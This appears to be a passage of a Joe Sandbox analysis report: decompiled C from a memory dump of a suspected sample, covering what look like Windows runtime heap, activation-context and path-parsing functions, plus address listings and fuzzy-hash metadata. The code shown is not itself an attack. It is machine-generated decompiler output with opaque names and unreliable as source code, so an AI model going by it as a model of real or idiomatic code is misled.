				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = L017E4C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E0175D000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E017E5542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x18060e8;
								if( *0x18060e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x18060e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E01759710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E01756DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E0175F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0175F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0175F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0175FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0175FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0175F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0175F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = L017E4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0176D130(_t427, _t494, _t511);
				}
			}

0x017e5ba5
0x017e5baa
0x017e5baf
0x017e5bb4
0x017e5bb6
0x017e5bbc
0x017e5bbe
0x017e5bc4
0x017e5bcd
0x017e5bd3
0x017e5bd6
0x017e5bdc
0x017e5be0
0x017e5be3
0x017e5beb
0x017e5bf2
0x017e5bf8
0x017e5bfe
0x017e5c04
0x017e5c0e
0x017e5c18
0x017e5c1f
0x017e5c25
0x017e5c2a
0x017e5c2c
0x017e5c32
0x017e5c3a
0x017e5c3f
0x017e5c42
0x017e5c48
0x017e5c5b
0x017e5c5b
0x017e5c2c
0x017e5cb7
0x017e5cb9
0x017e5cbf
0x017e5cc2
0x017e5cca
0x017e5ccb
0x017e5ccb
0x017e5cd1
0x017e5cd7
0x017e5cda
0x017e5ce1
0x017e5ce4
0x017e5ce7
0x017e5ced
0x017e5cf3
0x017e5cf9
0x017e5cff
0x017e5d08
0x017e5d0a
0x017e5d0e
0x017e5d10
0x00000000
0x00000000
0x017e5d16
0x017e5d1a
0x00000000
0x00000000
0x017e5d20
0x017e5d22
0x017e5d25
0x017e5d2f
0x017e5d2f
0x017e5d33
0x017e5d3d
0x017e5d49
0x017e5d4b
0x00000000
0x00000000
0x017e5d5a
0x017e5d5d
0x017e5d60
0x00000000
0x00000000
0x017e5d66
0x017e5d69
0x00000000
0x00000000
0x017e5d6f
0x017e5d6f
0x017e5d73
0x017e5d79
0x017e5d7f
0x017e5d86
0x017e5d95
0x017e5d98
0x017e5dba
0x017e5dcb
0x017e5dce
0x017e5dd3
0x017e5dd6
0x017e5dd8
0x017e5de6
0x017e5dec
0x017e5dee
0x017e5df1
0x017e5df3
0x017e635a
0x017e635a
0x00000000
0x017e635a
0x017e5dfe
0x017e5e02
0x017e5e05
0x017e5e07
0x017e5e10
0x017e5e13
0x017e5e1b
0x017e5e1c
0x017e5e21
0x017e5e22
0x017e5e23
0x017e5e25
0x017e5e2a
0x017e5e2c
0x017e5e2e
0x017e5e36
0x017e5e39
0x017e5e42
0x017e5e47
0x017e5e4d
0x017e5e54
0x017e5e54
0x017e5e54
0x017e5e2e
0x017e5e5c
0x017e5e5f
0x017e5e62
0x017e5e64
0x017e5e6b
0x017e5e70
0x017e5e7a
0x017e5e7a
0x017e5e7a
0x017e5e6b
0x017e5e7e
0x017e5e7f
0x017e5e7f
0x017e5e81
0x017e5e87
0x017e5e8b
0x017e5e8c
0x017e5e8c
0x017e5e8c
0x017e5e9a
0x017e5e9c
0x017e5ea2
0x017e5ea6
0x017e5f50
0x017e5f50
0x017e5f57
0x017e5f66
0x017e5f66
0x017e5f66
0x017e5f68
0x017e5f6a
0x017e63d0
0x00000000
0x017e5f70
0x017e5f70
0x017e5f91
0x017e5f9c
0x017e5f9e
0x017e5fa4
0x017e5fa6
0x017e638c
0x017e6392
0x017e63a1
0x017e63a7
0x017e63af
0x017e63af
0x017e63bd
0x017e63d8
0x00000000
0x017e63d8
0x017e5fac
0x017e5fb2
0x017e5fb4
0x017e5fbd
0x017e5fc6
0x017e5fce
0x017e5fd4
0x017e5fdc
0x017e5fec
0x017e5fed
0x017e5fee
0x017e5fef
0x017e5ff9
0x017e5ffa
0x017e5ffb
0x017e5ffc
0x017e6000
0x017e6004
0x017e6012
0x017e6012
0x017e6018
0x017e6019
0x017e601a
0x017e601b
0x017e601c
0x017e6020
0x017e6059
0x017e605c
0x017e6061
0x017e6061
0x017e6022
0x017e6022
0x017e6022
0x017e6025
0x017e602a
0x017e602b
0x017e6031
0x017e6037
0x017e6038
0x017e603e
0x017e6048
0x017e6049
0x017e604a
0x017e604b
0x017e604c
0x017e604d
0x017e6053
0x017e6054
0x017e6054
0x017e6062
0x017e6065
0x017e6067
0x017e606a
0x017e6070
0x017e6075
0x017e6076
0x017e6081
0x017e6087
0x017e6095
0x017e6099
0x017e609e
0x017e60a4
0x017e60ae
0x017e60b0
0x017e60b3
0x017e60b6
0x017e60b8
0x017e60ba
0x017e60ba
0x017e60ba
0x017e60ba
0x017e60be
0x017e60c0
0x017e60c5
0x017e60c5
0x017e60c5
0x017e60c6
0x017e60cd
0x017e6114
0x017e60cf
0x017e60cf
0x017e60d4
0x017e60d5
0x017e60da
0x017e60db
0x017e60e1
0x017e60e2
0x017e60e8
0x017e60f8
0x017e60fd
0x017e60fe
0x017e6102
0x017e6104
0x017e6107
0x017e6109
0x017e610b
0x017e610b
0x017e610b
0x017e610b
0x017e610f
0x017e610f
0x017e6117
0x017e611a
0x017e611f
0x017e6125
0x017e6134
0x017e6139
0x017e613f
0x017e6146
0x017e6148
0x017e614b
0x017e614d
0x017e614f
0x017e614f
0x017e614f
0x017e614f
0x017e6153
0x017e6159
0x017e6159
0x017e615c
0x017e6163
0x017e6169
0x017e616c
0x017e6172
0x017e6181
0x017e6186
0x017e6187
0x017e618b
0x017e6191
0x017e6195
0x017e61a3
0x017e61bb
0x017e61c0
0x017e61c3
0x017e61cc
0x017e61d0
0x017e61dc
0x017e61de
0x017e61e1
0x017e61e4
0x017e61e6
0x017e61e8
0x017e61e8
0x017e61e8
0x017e61e8
0x017e61e6
0x017e61ec
0x017e61f3
0x017e6203
0x017e6209
0x017e620a
0x017e6216
0x017e621d
0x017e6227
0x017e6241
0x017e6246
0x017e624c
0x017e6257
0x017e6259
0x017e625c
0x017e625e
0x017e6260
0x017e6260
0x017e6260
0x017e6260
0x017e625e
0x017e6264
0x017e6267
0x017e6269
0x017e6315
0x017e6315
0x017e631b
0x017e631e
0x017e6324
0x017e6327
0x017e632f
0x017e6330
0x017e6333
0x017e633a
0x017e633c
0x017e6335
0x017e6335
0x017e6335
0x017e633f
0x017e6342
0x017e634c
0x017e6352
0x017e6355
0x017e6355
0x017e6359
0x00000000
0x017e626f
0x017e6275
0x017e6275
0x017e6278
0x017e627e
0x017e627e
0x017e6281
0x017e6287
0x017e628d
0x017e6298
0x017e629c
0x017e62a2
0x017e629e
0x017e629e
0x017e629e
0x017e62a7
0x017e62a7
0x017e62aa
0x017e62b0
0x017e62f0
0x017e62f0
0x017e62f2
0x017e62f8
0x017e62fd
0x017e62b2
0x017e62b2
0x017e62b2
0x017e62b5
0x017e62dd
0x017e62e2
0x017e62e5
0x017e62b7
0x017e62b8
0x017e62bb
0x017e62bd
0x017e62c0
0x017e62c4
0x017e62cd
0x017e62cd
0x017e62c0
0x017e62bb
0x017e62b5
0x017e6302
0x017e6303
0x017e6305
0x017e6305
0x017e6305
0x017e630c
0x017e630c
0x00000000
0x017e627e
0x017e6269
0x017e5eac
0x017e5ebb
0x017e5ebe
0x017e5ecb
0x017e5ecb
0x017e5ece
0x017e5ece
0x017e5ed4
0x017e5ed7
0x017e5ed9
0x017e5edb
0x017e5edb
0x017e5ee1
0x017e5ee1
0x017e5ee3
0x017e5f20
0x017e5f20
0x017e5ee5
0x017e5ee5
0x017e5ee5
0x017e5ee8
0x017e5f11
0x017e5f18
0x017e5eea
0x017e5eea
0x017e5eed
0x017e5ef2
0x017e5ef8
0x017e5efb
0x017e5f0a
0x017e5f0a
0x017e5eed
0x017e5ee8
0x017e5f22
0x017e5f28
0x00000000
0x00000000
0x017e5f30
0x017e5f31
0x017e5f37
0x017e5f3a
0x017e5f3d
0x017e5f44
0x00000000
0x00000000
0x00000000
0x017e5f46
0x017e5f48
0x017e5f4d
0x00000000
0x017e5f4d
0x017e5dda
0x017e5ddf
0x00000000
0x017e5ddf
0x017e5dd8
0x017e5da7
0x017e5da9
0x017e5dac
0x017e5dae
0x00000000
0x017e5db4
0x017e5db4
0x00000000
0x017e5db4
0x017e5dae
0x017e5d88
0x017e5d8d
0x017e6363
0x017e6369
0x017e636a
0x017e6370
0x017e6372
0x017e637a
0x017e637b
0x017e637d
0x00000000
0x00000000
0x017e637f
0x017e6385
0x00000000
0x017e6385
0x017e5d38
0x017e5d3b
0x00000000
0x00000000
0x00000000
0x017e5d3b
0x017e5d27
0x017e5d29
0x00000000
0x00000000
0x00000000
0x017e6360
0x00000000
0x017e6360
0x017e5c10
0x017e5c10
0x017e63da
0x017e63e5
0x017e63e5

Memory Dump Source

Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e713dd3086739fcca737fe09c6c9cb55042ba98b442d001a50ca4d82c0548eae
Instruction ID: 9adf5dcd4ecc34b3d618dc689c93441dc01fe0b49eaf8a55759c59bf614f45b1
Opcode Fuzzy Hash: e713dd3086739fcca737fe09c6c9cb55042ba98b442d001a50ca4d82c0548eae
Instruction Fuzzy Hash: 33425A75900229CFDB64CF68C884BA9FBF1FF59304F1481AAE94DAB242D7749A85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01734120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01734120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x180d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0174F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = L01736E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01734620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = L01736E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
